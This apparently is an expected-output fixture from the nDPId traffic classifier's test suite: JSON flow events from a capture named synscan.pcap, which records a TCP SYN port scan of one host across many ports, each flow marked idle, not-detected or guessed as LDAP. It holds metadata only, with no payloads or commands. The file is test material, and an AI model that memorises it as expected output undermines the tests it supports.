+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 